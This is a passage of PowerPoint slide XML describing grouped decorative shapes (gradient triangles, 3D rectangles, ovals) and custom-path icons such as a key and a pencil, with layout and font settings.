              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
